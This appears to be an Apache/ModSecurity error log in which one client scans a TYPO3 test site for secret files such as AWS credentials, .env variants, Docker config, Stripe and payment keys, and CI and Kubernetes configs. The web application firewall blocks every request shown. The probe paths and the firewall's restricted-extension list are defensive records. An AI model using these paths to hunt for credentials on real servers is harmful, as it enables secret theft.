[Thu Jan 08 21:15:53.401385 2026] [:error] [pid 1270042] [client 18.119.100.98:47846] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWAQeS7RlX2cRjHcFz6xoAAAAAY"]
[Thu Jan 08 21:15:53.401610 2026] [:error] [pid 1270042] [client 18.119.100.98:47846] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWAQeS7RlX2cRjHcFz6xoAAAAAY"]
[Thu Jan 08 21:15:53.401773 2026] [:error] [pid 1270042] [client 18.119.100.98:47846] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWAQeS7RlX2cRjHcFz6xoAAAAAY"]
[Thu Jan 08 21:15:54.848014 2026] [:error] [pid 1270036] [client 18.119.100.98:48212] [client 18.119.100.98] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWAQeuM1154Q6b0hewijYwAAAAE"]
[Thu Jan 08 21:15:54.848222 2026] [:error] [pid 1270036] [client 18.119.100.98:48212] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWAQeuM1154Q6b0hewijYwAAAAE"]
[Thu Jan 08 21:15:54.848384 2026] [:error] [pid 1270036] [client 18.119.100.98:48212] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWAQeuM1154Q6b0hewijYwAAAAE"]
[Thu Jan 08 21:15:55.194514 2026] [authz_core:error] [pid 1270037] [client 18.119.100.98:48290] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Thu Jan 08 21:15:56.275909 2026] [authz_core:error] [pid 1270039] [client 18.119.100.98:48556] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/errors.log
[Thu Jan 08 21:15:56.983139 2026] [authz_core:error] [pid 1270042] [client 18.119.100.98:48750] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Thu Jan 08 21:15:57.329445 2026] [authz_core:error] [pid 1283304] [client 18.119.100.98:48844] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Thu Jan 08 21:15:57.677141 2026] [authz_core:error] [pid 1280390] [client 18.119.100.98:48936] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Thu Jan 08 21:15:58.020684 2026] [:error] [pid 1270043] [client 18.119.100.98:49024] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWAQfgvEr1EpOYnVfM6riwAAAAc"]
[Thu Jan 08 21:15:58.020991 2026] [:error] [pid 1270043] [client 18.119.100.98:49024] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWAQfgvEr1EpOYnVfM6riwAAAAc"]
[Thu Jan 08 21:15:58.021145 2026] [:error] [pid 1270043] [client 18.119.100.98:49024] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Thumbs.db"] [unique_id "aWAQfgvEr1EpOYnVfM6riwAAAAc"]
[Thu Jan 08 21:15:59.095681 2026] [authz_core:error] [pid 1270035] [client 18.119.100.98:49278] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/k8s-config.yml
[Thu Jan 08 21:15:59.437349 2026] [authz_core:error] [pid 1270038] [client 18.119.100.98:49372] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes.yml
[Thu Jan 08 21:16:00.150892 2026] [:error] [pid 1270041] [client 18.119.100.98:49554] [client 18.119.100.98] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWAQgM3GwEx_BV8-CrWUJgAAAAU"]
[Thu Jan 08 21:16:00.151114 2026] [:error] [pid 1270041] [client 18.119.100.98:49554] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWAQgM3GwEx_BV8-CrWUJgAAAAU"]
[Thu Jan 08 21:16:00.151291 2026] [:error] [pid 1270041] [client 18.119.100.98:49554] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWAQgM3GwEx_BV8-CrWUJgAAAAU"]
[Thu Jan 08 21:16:00.853738 2026] [authz_core:error] [pid 1283304] [client 18.119.100.98:49728] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.override.yml
[Thu Jan 08 21:16:01.199345 2026] [authz_core:error] [pid 1280390] [client 18.119.100.98:49800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yaml
[Thu Jan 08 21:16:05.185505 2026] [authz_core:error] [pid 1270043] [client 18.119.100.98:50828] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secrets.yml
[Thu Jan 08 21:16:07.361832 2026] [authz_core:error] [pid 1270041] [client 18.119.100.98:51366] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/s3.yml
[Thu Jan 08 21:16:08.073232 2026] [:error] [pid 1283304] [client 18.119.100.98:51550] [client 18.119.100.98] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWAQiGAwUIZgFNkik8yVHwAAAAg"]
[Thu Jan 08 21:16:08.073453 2026] [:error] [pid 1283304] [client 18.119.100.98:51550] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWAQiGAwUIZgFNkik8yVHwAAAAg"]
[Thu Jan 08 21:16:08.074522 2026] [:error] [pid 1283304] [client 18.119.100.98:51550] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aWAQiGAwUIZgFNkik8yVHwAAAAg"]
[Thu Jan 08 21:16:08.422393 2026] [:error] [pid 1280390] [client 18.119.100.98:51624] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWAQiNKTJIy7S9W5nL2LIwAAAAk"]
[Thu Jan 08 21:16:08.422632 2026] [:error] [pid 1280390] [client 18.119.100.98:51624] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWAQiNKTJIy7S9W5nL2LIwAAAAk"]
[Thu Jan 08 21:16:08.422793 2026] [:error] [pid 1280390] [client 18.119.100.98:51624] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.2"] [unique_id "aWAQiNKTJIy7S9W5nL2LIwAAAAk"]
[Thu Jan 08 21:16:08.770044 2026] [:error] [pid 1270043] [client 18.119.100.98:51720] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWAQiAvEr1EpOYnVfM6rjgAAAAc"]
[Thu Jan 08 21:16:08.770253 2026] [:error] [pid 1270043] [client 18.119.100.98:51720] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWAQiAvEr1EpOYnVfM6rjgAAAAc"]
[Thu Jan 08 21:16:08.770436 2026] [:error] [pid 1270043] [client 18.119.100.98:51720] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWAQiAvEr1EpOYnVfM6rjgAAAAc"]
[Thu Jan 08 21:16:09.122784 2026] [:error] [pid 1270036] [client 18.119.100.98:51810] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWAQieM1154Q6b0hewijZwAAAAE"]
[Thu Jan 08 21:16:09.123003 2026] [:error] [pid 1270036] [client 18.119.100.98:51810] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWAQieM1154Q6b0hewijZwAAAAE"]
[Thu Jan 08 21:16:09.123166 2026] [:error] [pid 1270036] [client 18.119.100.98:51810] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWAQieM1154Q6b0hewijZwAAAAE"]
[Thu Jan 08 21:16:17.476965 2026] [authz_core:error] [pid 1270038] [client 18.119.100.98:53902] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Thu Jan 08 21:16:18.910512 2026] [authz_core:error] [pid 1283304] [client 18.119.100.98:54188] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Thu Jan 08 21:16:24.322079 2026] [:error] [pid 1270035] [client 18.119.100.98:55202] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "aWAQmCYqm_i2BUcmtQb4hwAAAAA"]
[Thu Jan 08 21:16:24.322454 2026] [:error] [pid 1270035] [client 18.119.100.98:55202] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "aWAQmCYqm_i2BUcmtQb4hwAAAAA"]
[Thu Jan 08 21:16:24.322611 2026] [:error] [pid 1270035] [client 18.119.100.98:55202] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "aWAQmCYqm_i2BUcmtQb4hwAAAAA"]
[Thu Jan 08 21:16:24.667306 2026] [authz_core:error] [pid 1270038] [client 18.119.100.98:55278] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Thu Jan 08 21:16:28.296876 2026] [authz_core:error] [pid 1270038] [client 18.119.100.98:56272] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Thu Jan 08 21:16:29.017320 2026] [authz_core:error] [pid 1270041] [client 18.119.100.98:56486] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Thu Jan 08 21:16:29.721819 2026] [authz_core:error] [pid 1283304] [client 18.119.100.98:56718] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Thu Jan 08 21:16:30.425709 2026] [authz_core:error] [pid 1270043] [client 18.119.100.98:56914] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Thu Jan 08 21:16:30.774306 2026] [authz_core:error] [pid 1270036] [client 18.119.100.98:57018] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Thu Jan 08 21:16:31.121131 2026] [authz_core:error] [pid 1270037] [client 18.119.100.98:57092] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Thu Jan 08 21:16:31.467678 2026] [authz_core:error] [pid 1270035] [client 18.119.100.98:57180] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Thu Jan 08 21:16:31.815304 2026] [authz_core:error] [pid 1270038] [client 18.119.100.98:57244] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Thu Jan 08 21:16:32.169041 2026] [authz_core:error] [pid 1270039] [client 18.119.100.98:57316] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Thu Jan 08 21:16:32.525777 2026] [authz_core:error] [pid 1270041] [client 18.119.100.98:57388] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.bitbucket
[Thu Jan 08 21:16:35.913208 2026] [:error] [pid 1270039] [client 18.119.100.98:58140] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/keys/payment.key"] [unique_id "aWAQo5ccQYhM1DUhi_W69AAAAAQ"]
[Thu Jan 08 21:16:35.913523 2026] [:error] [pid 1270039] [client 18.119.100.98:58140] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/keys/payment.key"] [unique_id "aWAQo5ccQYhM1DUhi_W69AAAAAQ"]
[Thu Jan 08 21:16:35.913672 2026] [:error] [pid 1270039] [client 18.119.100.98:58140] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/keys/payment.key"] [unique_id "aWAQo5ccQYhM1DUhi_W69AAAAAQ"]
[Thu Jan 08 21:16:37.378738 2026] [authz_core:error] [pid 1280390] [client 18.119.100.98:58444] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Thu Jan 08 21:16:50.781262 2026] [authz_core:error] [pid 1270041] [client 18.119.100.98:33996] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/k8s
[Thu Jan 08 21:16:51.127474 2026] [authz_core:error] [pid 1270042] [client 18.119.100.98:34070] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/k8s
[Thu Jan 08 21:16:51.473765 2026] [authz_core:error] [pid 1283304] [client 18.119.100.98:34168] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/helm
[Thu Jan 08 21:16:53.639171 2026] [authz_core:error] [pid 1270038] [client 18.119.100.98:34742] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/pulumi
[Thu Jan 08 21:16:55.815207 2026] [:error] [pid 1270043] [client 18.119.100.98:35246] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/stripe.old"] [unique_id "aWAQtwvEr1EpOYnVfM6rmwAAAAc"]
